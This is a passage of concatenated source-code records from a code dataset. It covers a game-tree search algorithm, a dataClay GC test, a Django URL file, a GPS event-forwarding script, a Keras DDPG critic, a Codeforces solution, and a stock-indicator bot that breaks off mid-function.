[real_ret_dist[0]]\n i = 1\n while i < len(real_ret_dist) - 1:\n if math.fabs(approximated_ret_dist[-1][1] - real_ret_dist[i][1]) > (1 / len(real_ret_dist)):\n approximated_ret_dist.append(real_ret_dist[i])\n i = i + 1\n approximated_ret_dist.append(real_ret_dist[-1])\n real_ret_dist = approximated_ret_dist\n return approximated_ret_dist\n\n return real_ret_dist\n\n def _compute_Us(self, node, s, return_children=False):\n\n # if node.terminal:\n # if node.is_max:\n # return [-1 for b in node.buckets]\n # else:\n # return [1 for b in node.buckets]\n if self.children.get(node) is None or len(self.children.get(node)) == 0:\n if node in s:\n return node.buckets, False\n else:\n return [(node.meanvalue, 1.0)], True\n\n is_max = node.is_max\n\n if return_children:\n ret = dict()\n for c in self.children[node]:\n ret[c] = self._compute_Us(c, s)[0]\n return ret\n child_dist = []\n is_single_value = True\n for c in self.children[node]:\n d, is_single_value_child = self._compute_Us(c, s)\n child_dist.append(d)\n is_single_value = is_single_value and is_single_value_child\n if is_single_value:\n if is_max:\n ret = [(max([item[0][0] for item in child_dist]), 1.0)]\n else:\n ret = [(min([item[0][0] for item in child_dist]), 1.0)]\n\n else:\n ret = self.compute_max_probability(child_dist, is_max=is_max)\n return ret, is_single_value\n\n def gather_leaves(self, node, path):\n path.append(node)\n if self.children.get(node) is None:\n if self.node_to_path.get(node) is None:\n self.node_to_path[node] = path\n return [node]\n ret = []\n for c in self.children.get(node):\n ret = ret + self.gather_leaves(c, copy.deepcopy(path))\n return ret\n\n def _compute_difference_of_distributions(self, dist1, dist2, is_max_coefficent):\n i = 0\n j = 0\n previous_distance_i = 0\n previous_distance_j = 0\n ret = []\n cdf = 0\n while i < len(dist1) and j < len(dist2):\n dist = min(dist1[i][1] - previous_distance_j ,dist2[j][1] - previous_distance_i)\n if dist:\n ret.append((is_max_coefficent * (dist1[i][0] - dist2[j][0]), cdf + dist))\n cdf = ret[-1][1]\n if i == len(dist1) - 1:\n previous_distance_j = dist2[j][1]\n j = j + 1\n\n\n elif j == len(dist2) - 1 or (dist1[i][1]) < (dist2[j][1]):\n previous_distance_i = dist1[i][1]\n i = i + 1\n else:\n previous_distance_j = dist2[j][1]\n j = j + 1\n return ret\n \n \n \n\n def _compute_mean_of_distribution_max_0(self, dist):\n mean = max(dist[0][0], 0) * dist[0][1]\n for i in range(1, len(dist)):\n mean += max(dist[i][0], 0) * (dist[i][1] - dist[i - 1][1])\n return mean\n\n def _compute_bvoi_of_child(self, Unode, Ucompare_against, is_alpha=False, is_max=True):\n sum = 0\n is_max_coefficent = 1\n if not is_max:\n is_max_coefficent = -1\n\n if not is_alpha:\n return self._compute_mean_of_distribution_max_0(self._compute_difference_of_distributions(Unode, Ucompare_against, is_max_coefficent ))\n\n else:\n return self._compute_mean_of_distribution_max_0(self._compute_difference_of_distributions(Ucompare_against, Unode, is_max_coefficent ))\n\n def chance_for_dist_biggersmaller_than_val(self, dist, val, bigger_mode=True):\n sum = 0\n len_dist = len(dist)\n for i in range(len_dist):\n if dist[i][0] > val:\n break\n sum = dist[i][1]\n if not bigger_mode:\n return sum\n return 1 - sum\n\n def _S_gather_rec_CVIBES(self, node, v, prob_table, prob_of_root, path_table, S, path):\n\n if self.children.get(node) is None:\n S.append(node)\n path_table[node] = path + [node]\n else:\n for c in self.children[node]:\n if prob_table.get(c.__hash__(), v) is None:\n print(\"Jaja\")\n 
self._store_probabilities_rec(node, {}, 0.6)\n if prob_table[c.__hash__(), v] == prob_of_root:\n S = self._S_gather_rec_CVIBES(c, v, prob_table, prob_of_root, path_table, S, path + [node])\n return S\n\n def _store_probabilities(self, node, s, table, v, bigger_mode=True):\n return self._store_probabilities_rec(node, table, v, bigger_mode)\n\n def _store_probabilities_rec(self, node, table, v, bigger_mode=True):\n\n if self.children.get(node) is None or node.terminal:\n table[node.__hash__(), v] = self.chance_for_dist_biggersmaller_than_val(node.buckets, v,\n bigger_mode=bigger_mode)\n return node.buckets\n\n is_max = node.is_max\n child_dist = []\n for c in self.children[node]:\n Us_c = self._store_probabilities_rec(c, table, v, bigger_mode=bigger_mode)\n if len(Us_c) == 0:\n while True:\n print(\"Shit\")\n self._store_probabilities_rec(c, table, v, bigger_mode=bigger_mode)\n child_dist.append(Us_c)\n ret = self.compute_max_probability(child_dist, is_max=is_max)\n\n x = self.chance_for_dist_biggersmaller_than_val(ret, v, bigger_mode=bigger_mode)\n table[node.__hash__(), v] = x\n return ret\n\n def _find_k_best_VPI(self, s, k, alpha, c, is_alpha_children):\n queue = PriorityQueue()\n for leaf in s:\n item = PrioritizedItem(-1 * self._compute_bvoi_of_child(self._compute_Us_for_node(c, [leaf]),\n self._compute_Us_for_node(alpha, [leaf]),\n is_alpha=is_alpha_children,\n is_max=not alpha.is_max), leaf)\n queue.put(item)\n return queue.queue\n\n def _conspiracy_choice(self, node):\n # There are still items in the conspiracy queues\n if len(self.conspiracy_queue) > 0:\n return self.node_to_path_CVIBES[self.conspiracy_queue.pop()]\n\n # different behaviors whether we are the min or max player\n is_max = node.is_max\n\n # Lines 1-5\n alpha_node = self.alpha[node]\n alpha_mean = alpha_node.meanvalue\n coff_stash = [1.05, 1, 0.95, 0.9, 0.8]\n v_stash = []\n for coff in coff_stash:\n v_stash.append(coff * alpha_mean)\n\n prob_dict = dict()\n\n for c in self.children[node]:\n for V in v_stash:\n s = self.gather_leaves(c, [])\n if c.__hash__() == alpha_node.__hash__():\n self._store_probabilities(c, s, prob_dict, V, bigger_mode=not is_max)\n else:\n self._store_probabilities(c, s, prob_dict, V, bigger_mode=is_max)\n # Line 6\n max = 0\n maxV = None\n maxV_tag = None\n max_c = None\n for i in range(len(v_stash)):\n for j in range(i + 1, len(v_stash)):\n for c in self.children[node]:\n if c.__hash__() != alpha_node.__hash__():\n if is_max:\n eq_8 = (v_stash[i] - v_stash[j]) * prob_dict[alpha_node.__hash__(), v_stash[j]] * prob_dict[\n c.__hash__(), v_stash[i]]\n else:\n eq_8 = (v_stash[i] - v_stash[j]) * prob_dict[alpha_node.__hash__(), v_stash[i]] * prob_dict[\n c.__hash__(), v_stash[j]]\n if max < eq_8:\n max = eq_8\n if is_max:\n maxV = v_stash[j]\n maxV_tag = v_stash[i]\n else:\n maxV_tag = v_stash[j]\n maxV = v_stash[i]\n max_c = c\n if max < 0.05:\n return [node, alpha_node]\n # Lines 7-16\n S1 = self._S_gather_rec_CVIBES(alpha_node, maxV, prob_dict, prob_dict[alpha_node.__hash__(), maxV],\n self.node_to_path_CVIBES, [], [])\n S2 = self._S_gather_rec_CVIBES(max_c, maxV_tag, prob_dict, prob_dict[max_c.__hash__(), maxV_tag],\n self.node_to_path_CVIBES, [], [])\n\n # BSM(N,K)\n K1 = self._find_k_best_VPI(S1, self.BSM_K, alpha_node, self.beta1[node], is_alpha_children=True)\n K2 = self._find_k_best_VPI(S2, self.BSM_K, alpha_node, max_c, is_alpha_children=False)\n\n S = []\n i1 = 0\n i2 = 0\n K_size = min([self.BSM_K, len(K1) + len(K2)])\n for i in range(K_size):\n if i1 == len(K1):\n 
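# K1 is exhausted; fall back to K2's current candidate\n                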
S.append(K2[i2].item)\n elif i2 == len(K2):\n S.append(K1[i1].item)\n elif K1[i1].priority < K2[i2].priority:\n S.append(K1[i1].item)\n i1 = i1 + 1\n else:\n S.append(K2[i2].item)\n i2 = i2 + 1\n\n leftover_1_items_with_priority = K1[i1:]\n leftover_2_items_with_priority = K2[i2:]\n leftover_1 = []\n leftover_2 = []\n # Converting the BVOI+node objects to node objects\n for i in range(len(leftover_1_items_with_priority)):\n leftover_1.append(leftover_1_items_with_priority[i].item)\n for i in range(len(leftover_2_items_with_priority)):\n leftover_2.append(leftover_2_items_with_priority[i].item)\n # Choosing random K nodes from the leftovers\n leftovers = leftover_1 + leftover_2\n S_random = random.choices(leftovers, k=min([self.BSM_K, len(leftovers)]))\n S = S + S_random\n\n # Setting the new 2K array as the new conspiracy queue\n for i in range(self.BSM_N):\n self.conspiracy_queue = self.conspiracy_queue + S\n if not self.conspiracy_queue:\n return [node, alpha_node]\n return self.node_to_path_CVIBES[self.node_to_pick.pop()]\n\n def _batch_gather_greedy(self, node):\n\n s = []\n alpha_node = self.alpha[node]\n beta1_node = self.beta1[node]\n alpha_Us = self._compute_Us(alpha_node, [])[0]\n beta_Us = self._compute_Us(beta1_node, [])[0]\n leaves = self.gather_leaves(node, [])\n\n K_queue = []\n\n if self.mode == \"FT Greedy\":\n for _ in range(self.BSM_K):\n K_queue.append((None, -1))\n if self.mode == \"MGSS*\":\n maxx = 0\n entered = 0\n for l in leaves:\n if l in s:\n continue\n c = self.node_to_path[l][1]\n Usc = self._compute_Us_for_node(c, [l])\n\n if len(Usc) > 1:\n entered +=1\n if c.__hash__() != alpha_node.__hash__():\n c_bvoi = self._compute_bvoi_of_child(Usc, alpha_Us, is_alpha=False,\n is_max=node.is_max)\n else:\n c_bvoi = self._compute_bvoi_of_child(Usc, beta_Us, is_alpha=True, is_max=node.is_max)\n\n\n if c_bvoi > 0:\n s.append(l)\n if self.mode == \"FT Greedy\":\n put_in_queue_l_vpi((l, c_bvoi), K_queue)\n if self.mode == \"MGSS*\":\n if c_bvoi > maxx:\n maxx = c_bvoi\n s = [l]\n\n\n if len(s) == 0:\n alpha_leaves = self.gather_leaves(alpha_node, [])\n for l in alpha_leaves:\n if l.meanvalue == alpha_Us[0][0]:\n s = [l]\n K_queue = [(l,0)]\n break\n \n return s, K_queue\n\n def _BVOI_select(self, node):\n if self.mode == \"FT Greedy\" and len(self.node_to_pick) > 0:\n return self.node_to_path[self.node_to_pick.pop()]\n\n if len(self.children[node]) == 1:\n for i in self.children[node]:\n if i is None:\n print(\"Oish noo2\")\n print(node.tup)\n if self.mode == \"FT Greedy\" or self.mode == \"MGSS*\":\n return [node, i]\n return i\n\n s, best_VPI_k_nodes_for_FT = self._batch_gather_greedy(node)\n if self.mode == \"MGSS*\":\n if len(s) == 0:\n return [node, self.alpha[node]]\n else:\n return self.node_to_path[s[0]]\n if self.mode == \"FT Greedy\":\n if len(s) == 0:\n return [node, self.alpha[node]]\n for _ in range(self.BSM_N):\n for l_vpi_pair in best_VPI_k_nodes_for_FT:\n if l_vpi_pair[0] is not None:\n self.node_to_pick.append((l_vpi_pair[0]))\n return self.node_to_path[self.node_to_pick.pop()]\n\n if len(s) == 0: # TODO ADD THIS!!!!!\n if self.alpha[node] is None:\n print(\"Oish noo3\")\n print(node.tup)\n return self.alpha[node]\n max = 0\n max_child = None\n alpha_node = self.alpha[node]\n beta1_node = self.beta1[node]\n child_to_Us = self._compute_Us_for_all_children(node, s)\n alpha_Us = child_to_Us[alpha_node]\n beta1_Us = child_to_Us[beta1_node]\n\n for c in self.children[node]:\n child_Us = child_to_Us[c]\n if c.__hash__() != alpha_node.__hash__():\n c_bvoi = 
self._compute_bvoi_of_child(child_Us, alpha_Us, is_alpha=False, is_max=node.is_max)\n else:\n c_bvoi = self._compute_bvoi_of_child(child_Us, beta1_Us, is_alpha=True, is_max=node.is_max)\n if max <= c_bvoi:\n max = c_bvoi\n max_child = c\n if max_child is None:\n print(\"bk\")\n return alpha_node\n return max_child\n\n\n\n\ndef shift_right_with_value(queue, index, new_value):\n for i in reversed(range(index + 1, len(queue))):\n queue[i] = queue[i - 1]\n queue[index] = new_value\n\n\ndef put_in_queue_l_vpi(l_vpi_pair, queue):\n for i in range(len(queue)):\n if queue[i][1] < l_vpi_pair[1]:\n shift_right_with_value(queue, i, l_vpi_pair)\n return\n\n\n\n","sub_path":"SearchAlgoirthm.py","file_name":"SearchAlgoirthm.py","file_ext":"py","file_size_in_byte":21044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"319058060","text":"from __future__ import absolute_import\n\"\"\" Class description goes here. \"\"\"\n\n\"\"\" \nUse absolute imports. By default, when you import a package in Python 2, it adds '.' in the beggining, it means all \nimports are relative. It's a problem for our testing since our test can be in a package but our stubs are not including \nthe package of the test (and shouldn't!). With __future__ we add Python 3 functionality for all imports to be absolute. \n\"\"\"\n# Initialize dataClay\nfrom mock.simplemock import SimpleMock\nfrom dataclay.heap import ExecutionEnvironmentHeapManager\nimport unittest \nimport os\nimport resource\nimport time\nimport gc\nimport sys\nfrom unittest.case import SkipTest\nimport logging\nimport pytest\nfrom dataclay.util import Configuration\n\n\"\"\"\nMemory testing. \n\"\"\"\nlogger = logging.getLogger(__name__)\n\n\nclass GCUpdateTestCase(unittest.TestCase):\n\n \"\"\"\n DataClayMock object for simulation. \n \"\"\"\n \n mock = SimpleMock() \n \n def setUp(self):\n \"\"\" To force GC, hack memory pressure \"\"\"\n\n # ToDo: the (...).Configuration is extremely ugly and completely useless\n # ToDo: @abarcelo I left it like that because I did not understand previous\n # ToDo: ExecutionEnvironmentHeapManager.GC_MEMORY_... usage\n Configuration.MEMMGMT_PRESSURE_FRACTION = 0.01\n \n rsrc = resource.RLIMIT_AS\n soft, hard = resource.getrlimit(rsrc)\n logger.debug('Soft limit starts as :%s', soft)\n logger.debug('Hard limit starts as :%s', hard)\n\n kb = 1024\n mb = 1024 * kb\n gb = 1024 * mb\n # resource.setrlimit(rsrc, (-1, hard)) \n \n soft, hard = resource.getrlimit(rsrc)\n logger.debug('Soft limit changed to :%s', soft)\n \"\"\"\n PyUnit function called before every test case.\n Starts DataClay simulation in one Python interpreter and one Java VM. This allows us to Debug in a local machine without \n dockers and without a full start of DataClay (jars, configurations, ...) \n \"\"\" \n self.mock.setUp(__file__)\n\n def tearDown(self):\n \"\"\" \n Finish all services started for simulation. \n \"\"\" \n self.mock.tearDown()\n \n @pytest.mark.timeout(300, method='thread')\n def test(self):\n \"\"\"Test. note that all test method names must begin with 'test.'\"\"\"\n \"\"\"WARNING: IT IS HIGHLY RECOMMENDED TO HAVE ONE TEST ONLY TO ISOLATE FUNCTIONAL TESTS FROM EACH OTHER. i.e. \n Start a new Python Interpreter and JVM for each test. In the end, it means only one test in this class. \"\"\"\n from dataclay.api import init\n\n logger.debug('**Starting init**')\n init()\n \n \"\"\" \n Imports. Imports must be located here in order to simulate \"import\" order in a real scenario. 
\n VERY IMPORTANT: Imports must be located AFTER init\n \"\"\"\n from model.classes import WebSite, WebPage, URI\n\n self.session_initialized = True\n \n \"\"\"\n Test. From now on, the Functional Test itself. \n \"\"\"\n \n host = \"bsc.es\"\n web_site = WebSite(host + \"/foo/bsc.html\")\n web_site.make_persistent(alias=web_site.uri.host)\n \n cur_host = \"volatile_web\"\n web_page = WebPage(cur_host)\n logger.debug(\"web page oid = %s\", web_page.get_object_id())\n logger.debug(\"uri oid = %s\", web_page.uri.get_object_id())\n web_site.add_web_page(web_page)\n \n \"\"\" Sleep enough time to allow GC action \"\"\"\n print(\"Waiting for GC action...\")\n time.sleep(5)\n \n \"\"\" Modify web page \"\"\" \n web_page.uri.host = \"new_volatile_web\"\n \n \"\"\" Sleep enough time to allow GC action \"\"\"\n print(\"Waiting for GC action...\")\n time.sleep(5)\n \n \"\"\" Get web page \"\"\" \n self.assertEquals(web_page.uri.host, \"new_volatile_web\")\n \n logger.debug(\"Test OK!\")\n","sub_path":"tests/functional_tests/memory/gc_update_test.py","file_name":"gc_update_test.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"160021463","text":"from django.conf.urls import url,include\nfrom django.contrib import admin\nfrom . import views\n\nurlpatterns = [\n url(r'^$',views.home),\n url(r'ask/$',views.askxml,name='askxml'),\n url(r'myform/$',views.myform,name='myform'),\n url(r'submitadd/$',views.submitadd,name='submitadd'),\n url(r'jsontest/$',views.jsontest,name='jsontest')\n]\n\n# Create your views here.\n","sub_path":"myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"203498933","text":"#!/usr/bin/python\nimport sys\nimport requests\nlist=sys.argv\n#element=list[1]\n#param=element.split(\",\")\nparam=[]\nfor i in range(0,11):\n param.append('868998030320317')\neid=\"1\"\n\ndesc=\"Evento:\"+eid\nif eid==\"1\" or eid==\"9\":\n desc=\"S.O.S\"\nif eid==\"3\":\n desc=\"ParoDeMotor\"\nif eid==\"4\":\n desc=\"EncendidoDeMotor\"\nif eid==\"5\":\n desc=\"Ubicacion\"\nif eid==\"6\":\n desc=\"CuentaExpirada\"\nif eid==\"7\":\n desc=\"Itinerario\"\nif eid==\"8\":\n desc=\"Otro\"\nif eid==\"23\":\n desc=\"CorteDeBateria\"\nif eid==\"28\":\n desc=\"CorteDeAntena\"\n\npluton=requests.get('https://pluto.dudewhereismy.com.mx/services/imeiInfo?imei='+param[1])\nresponse=pluton.json()\nif 'error' in response:\n if response['error']=='ok':\n if 'application_id' in response:\n app_id=response['application_id']\n if 'client_id' in response:\n client_id=response['client_id']\n else:\n client_id='No definido'\n if 'model' in response:\n model=response['model']\n else:\n model=\"nodef\"\n if 'color' in response:\n color=response['color']\n else:\n color='nocolor'\n if 'plates' in response:\n plates=response['plates']\n else:\n plates='noplates'\n if app_id==200 or app_id==559 or app_id==959:\n #NEZA\n desc='Neza_'+desc\n neza = requests.get('https://dispatch.dudewhereismy.com.mx/listener/neza?imei='+str(param[1])+'&event_id='+str(param[2])+'&event_desc='+desc+'&latitude='+str(param[4])+'&longitude='+str(param[5])+'&speed='+str(param[6])+'&azimuth='+str(param[7])+'&gpsvalid='+str(param[8])+'&rdatetime='+str(param[9])+'&vehicle='+str(model)+'|'+str(color)+'|'+str(plates)+\"&client_id=\"+str(client_id))\n neza = 
requests.get('http://c4neza.dwim.space/listener/one.html?imei='+str(param[1])+'&event_id='+str(param[2])+'&event_desc='+desc+'&latitude='+str(param[4])+'&longitude='+str(param[5])+'&speed='+str(param[6])+'&azimuth='+str(param[7])+'&gpsvalid='+str(param[8])+'&rdatetime='+str(param[9])+'&vehicle='+str(model)+'|'+str(color)+'|'+str(plates)+\"&client_id=\"+str(client_id))\n else:\n # KANAN\n if not desc[:6]==\"Evento\":\n internal_id=response['internal_id']\n if internal_id==3:\n desc='Kanan_'+desc\n kanan = requests.get('https://dispatch.dudewhereismy.com.mx/listener/kanan?imei='+str(param[1])+'&event_id='+str(param[2])+'&event_desc='+desc+'&latitude='+str(param[4])+'&longitude='+str(param[5])+'&speed='+str(param[6])+'&azimuth='+str(param[7])+'&gpsvalid='+str(param[8])+'&rdatetime='+str(param[9])+'&vehicle='+str(model)+'|'+str(color)+'|'+str(plates)+\"&client_id=\"+str(client_id))\n else:\n #print(\"gpscontrol\")\n desc='Plataforma3_'+desc\n kanan = requests.get('https://dispatch.dudewhereismy.com.mx/listener/plataforma3?imei='+str(param[1])+'&event_id='+str(param[2])+'&event_desc='+desc+'&latitude='+str(param[4])+'&longitude='+str(param[5])+'&speed='+str(param[6])+'&azimuth='+str(param[7])+'&gpsvalid='+str(param[8])+'&rdatetime='+str(param[9])+'&vehicle='+str(model)+'|'+str(color)+'|'+str(plates)+\"&client_id=\"+str(client_id))\n #else:\n #r = requests.get('https://dispatch.dudewhereismy.com.mx/listener/cp?account=' + param[0] + '&imei=' + param[1] + '&event_id=' + param[2] + '&event_desc=' + desc + '&latitude=' + param[4] + '&longitude=' + param[5] + '&speed=' + param[6] + '&azimuth=' + param[7] + '&gpsvalid=' + param[8] + '&rdatetime=' + param[9] + '&vehicle=' + param[10] + \"&internal_id=2\" + \"&client_id=\" + 'none')\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"535622551","text":"import numpy as np\nimport tensorflow as tf\n\n# Tensorflow layer imports\nfrom tensorflow.contrib.keras import layers, models, optimizers\nfrom tensorflow.contrib.keras import backend as K\nfrom tensorflow.contrib.keras import activations\nfrom tensorflow.contrib.keras import regularizers\nfrom tensorflow.contrib.keras import initializers\n\nclass Critic:\n\n\tdef __init__(self, state_size, action_size):\n\t\tself.state_size = state_size\n\t\tself.action_size = action_size\n\t\tself.build_model()\n\n\tdef build_model(self):\n\n\t\t# Define input layers\n\t\tinput_states = layers.Input(shape=(self.state_size,), name='input_states')\n\t\tinput_actions = layers.Input(shape=(self.action_size,), name='input_actions')\n\n\n\t\t#---------- copy from DDPG quadcopter ---------\n\t\t # Add hidden layer(s) for state pathway\n\t\tnet_states = layers.Dense(units=400 )(input_states)\n\t\t# net_states = layers.BatchNormalization()(net_states)\n\t\tnet_states = layers.Activation(\"relu\")(net_states)\n\n\t\tnet_states = layers.Dense(units=300)(net_states)\n\t\tnet_states = layers.Activation(\"relu\")(net_states)\n\n\t\t# Add hidden layer(s) for action pathway\n\t\tnet_actions = layers.Dense(units=300)(input_actions)\n\t\tnet_actions = layers.Activation(\"relu\")(net_actions)\n\n\t\t# net_actions = layers.Dense(units=250,kernel_regularizer=regularizers.l2(1e-7))(net_actions)\n\t\t# net_actions = layers.BatchNormalization()(net_actions)\n\t\t# net_actions = layers.Activation(\"relu\")(net_actions)\n\n\t\t# Combine state and action pathways\n\t\tnet = layers.Add()([net_states, 
net_actions])\n\t\tnet = layers.Activation('relu')(net)\n\n\t\tnet = layers.Dense(units=200, kernel_initializer=initializers.RandomUniform(minval=-0.5, maxval=0.5))(net)\n\t\tnet = layers.Activation('relu')(net)\n\n\t\t# Add final output layer to produce action values (Q values)\n\t\tQ_values = layers.Dense(units=1, name='q_values')(net)\n\n\n\t\t# ---------------- Hidden layers for states ----------------\n\t\t# model_states = layers.Dense(units=32, activation=activations.sigmoid)(input_states)\n\t\t# # model_states = layers.BatchNormalization()(model_states)\n\n\t\t# model_states = layers.Dense(units=16, activation=activations.sigmoid)(model_states)\n\t\t# # model_states = layers.BatchNormalization()(model_states)\n\n\t\t# # model_states = layers.Dense(units=64)(model_states)\n\t\t# # model_states = layers.BatchNormalization()(model_states)\n\n\t\t# # ---------------- Hidden layers for actions ----------------\n\t\t# model_actions = layers.Dense(units=16, activation=activations.sigmoid)(input_actions)\n\t\t# # model_actions = layers.BatchNormalization()(model_actions)\n\n\t\t# model_actions = layers.Dense(units=16, activation=activations.sigmoid)(model_actions)\n\t\t# # model_actions = layers.BatchNormalization()(model_actions)\n\n\t\t# # Both models merge here\n\t\t# model = layers.add([model_states, model_actions])\n\n\t\t# # Fully connected and batch normalization\n\t\t# model = layers.Dense(units=8, activation=activations.sigmoid)(model)\n\t\t# # model = layers.BatchNormalization()(model)\n\n\t\t# # model = layers.Dense(units=64, activation=activations.relu)(model)\n\t\t# # model = layers.BatchNormalization()(model)\n\n\t\t# # Q values / output layer\n\t\t# Q_values = layers.Dense(units=1, name='Q_s_a')(model)\n\t\t# # model = layers.BatchNormalization()(model)\n\n\t\t# Wrap the model with Keras\n\t\tself.model = models.Model(inputs=[input_states, input_actions], outputs=Q_values)\n\n\t\toptimizer = optimizers.Adam(lr=0.0001)\n\t\tself.model.compile(optimizer=optimizer, loss='mse')\n\n\t\t# gradient of the Q-values with respect to the actions (used by the actor update in DDPG)\n\t\taction_gradients = K.gradients(Q_values, input_actions)\n\t\tself.get_action_gradients = K.function(\n\t\t\tinputs=[*self.model.input, K.learning_phase()],\n\t\t\toutputs=action_gradients)\n","sub_path":"DDPG/Critic.py","file_name":"Critic.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"510145263","text":"# author: mofhu@github\n# A. 
Crossmarket\n\nt = int(input())\n\nfor ncase in range(1, t+1):\n n, m = [int(s) for s in input().split(' ')]\n if n == 1 and m == 1:\n ans = 0\n else:\n ans = 2* (min(n, m)) + max(n, m) - 2\n print(ans)\n","sub_path":"codeforces/Round816/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"106045457","text":"#threshold_days for the BB squeeze\n\nstocks = ['ADANIPORTS.NS', 'ASIANPAINT.NS', 'AXISBANK.NS', 'BAJAJ-AUTO.NS', 'BAJFINANCE.NS', 'BAJAJFINSV.NS', 'BHARTIARTL.NS', 'BPCL.NS', 'BRITANNIA.NS', 'CIPLA.NS', 'COALINDIA.NS', 'DIVISLAB.NS', 'DRREDDY.NS', 'EICHERMOT.NS', 'GAIL.NS', 'GRASIM.NS', 'HDFC.NS', 'HDFCBANK.NS', 'HDFCLIFE.NS', 'HEROMOTOCO.NS', 'HINDALCO.NS', 'HINDUNILVR.NS', 'ICICIBANK.NS', 'INDUSINDBK.NS', 'INFY.NS', 'IOC.NS', 'IRCON.NS', 'ITC.NS', 'JSWSTEEL.NS', 'KOTAKBANK.NS', 'LT.NS', 'M&M.NS', 'MARUTI.NS', 'NESTLEIND.NS', 'NTPC.NS', 'ONGC.NS', 'POWERGRID.NS', 'RELIANCE.NS', 'SBILIFE.NS', 'SBIN.NS', 'SHREECEM.NS', 'SUNPHARMA.NS', 'TATAMOTORS.NS', 'TATASTEEL.NS', 'TCS.NS', 'TECHM.NS', 'TITAN.NS', 'ULTRACEMCO.NS', 'UPL.NS', 'WIPRO.NS', 'AMBUJACEM.NS', 'BIRLACORPN.NS', 'CUB.NS', 'DCBBANK.NS', 'DFMFOODS.NS', 'DOLLAR.NS', 'ESCORTS.NS', 'HCG.NS', 'HCLTECH.NS', 'ISEC.NS', 'LUXIND.NS', 'NTPC.NS', 'PSPPROJECT.NS', 'SHREECEM.NS', 'SUBROS.NS', 'SPANDANA.NS', 'ULTRACEMCO.NS']\nstocksIown = ['WIPRO.NS', 'LUXIND.NS', 'DFMFOODS.NS', 'SUBROS.NS']\n#stocks = ['ADANIPORTS.csv', 'ASIANPAINT.csv', 'AXISBANK.csv']\n#This bot uses a variety of technical indicators to generate buy and sell calls of any stock.\n\n#Importing the needed libraries:\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport matplotlib\nplt.style.use('fivethirtyeight')\n\n\n\ndef test (stock):\n # Loading the data and making the date the index\n df = pd.read_csv(stock)\n df = df.set_index(pd.DatetimeIndex(df['Date']))\n\n # BOLLINGER BANDS CALCULATIONS\n Middle_band = df['Close'].rolling(window=20).mean() # MIDDLE BAND\n STD = df['Close'].rolling(window=20).std() # STD DEVIATION\n Upper_band = Middle_band + (STD * 2) # UPPER BAND\n Lower_band = Middle_band - (STD * 2) # LOWER BAND\n Bollinger_Band_Width = (Upper_band - Lower_band) / Middle_band # BOLLINGER BAND WIDTH\n\n # RSI CALCULATIONS\n delta = df['Close'].diff(1) # get the difference between closing prices\n delta = delta.dropna()\n up = delta.copy() # Get positive and negative gains/losses between 2 closing prices\n down = delta.copy()\n up[up < 0] = 0\n down[down > 0] = 0\n AVG_Gain = up.rolling(window=14).mean() # Calculate average gain and loss\n AVG_Loss = abs(down.rolling(window=14).mean())\n RS = AVG_Gain / AVG_Loss # Calculate relative strength\n RSI = 100.0 - (100.0 / (1.0 + RS)) # Calculate RSI\n\n # DEMA CALCULATIONS\n def DEMA(data, time_period, column):\n EMA = data[column].ewm(span=time_period, adjust=False).mean()\n DEMA = (2 * EMA) - (EMA.ewm(span=time_period, adjust=False).mean())\n return DEMA\n\n # MACD CALCULATIONS\n ShortEMA = df.Close.ewm(span=12, adjust=False).mean()\n LongEMA = df.Close.ewm(span=26, adjust=False).mean()\n MACD = ShortEMA - LongEMA\n Signal = MACD.ewm(span=9, adjust=False).mean()\n\n # MAKE A NEW DATA FRAME TO STORE ALL THIS\n new_df = pd.DataFrame()\n new_df['Close'] = df['Close']\n new_df['Open'] = df['Open']\n new_df['Middle_band'] = Middle_band\n new_df['STD'] = STD\n new_df['Upper_band'] = Upper_band\n new_df['Lower_band'] = Lower_band\n new_df['Band_width'] = 
Bollinger_Band_Width\n new_df['RSI'] = RSI\n new_df['DEMA_short'] = DEMA(new_df, 20, 'Close')\n new_df['DEMA_long'] = DEMA(new_df, 50, 'Close')\n new_df['MACD'] = MACD\n new_df['Signal'] = Signal\n\n # Function to get the index of any value you input\n def getIndex(dfCol, val):\n i = 0\n while i < len(dfCol):\n if dfCol[i] == val:\n return i\n else:\n i += 1\n return None\n\n # THIS FUNCTION DOES THE FOLLOWING:\n # Generate buy calls when BB price breaks and closes above middle band and RSI > 50\n # Generate sell calls when price closes above the upper BB band and RSI > 70\n # Generate buy calls when price closes below the lower BB band and RSI < 30\n def buy_or_sell_call(dataframe):\n buy_signal_normal = []\n sell_signal = []\n buy_signal_lower_band = []\n\n for index in range(len(dataframe['Close'])):\n if dataframe['Close'][index] > dataframe['Upper_band'][index] and dataframe['RSI'][index] > 72:\n sell_signal.append(dataframe['Close'][index])\n buy_signal_lower_band.append(np.nan)\n buy_signal_normal.append(np.nan)\n\n elif dataframe['Close'][index] > dataframe['Middle_band'][index] and dataframe['RSI'][index] > 50:\n sell_signal.append(np.nan)\n buy_signal_lower_band.append(np.nan)\n if dataframe['Close'][index - 1] < dataframe['Middle_band'][index - 1]: # Then you should buy\n buy_signal_normal.append(dataframe['Close'][index])\n else:\n buy_signal_normal.append(np.nan)\n\n elif dataframe['Close'][index] < dataframe['Lower_band'][index] and dataframe['RSI'][index] < 30:\n sell_signal.append(np.nan)\n buy_signal_normal.append(np.nan)\n buy_signal_lower_band.append(dataframe['Close'][index])\n\n else:\n buy_signal_normal.append(np.nan)\n sell_signal.append(np.nan)\n buy_signal_lower_band.append(np.nan)\n\n return buy_signal_normal, sell_signal, buy_signal_lower_band\n\n # separate them here\n # in the next step you can make 2 separate columns in new_df\n # then do what u want for that 1 column of the separate buy - u can append it in the list which already exists\n\n # Add new columns to our dataframe indicating the buy and sell signals we just got:\n 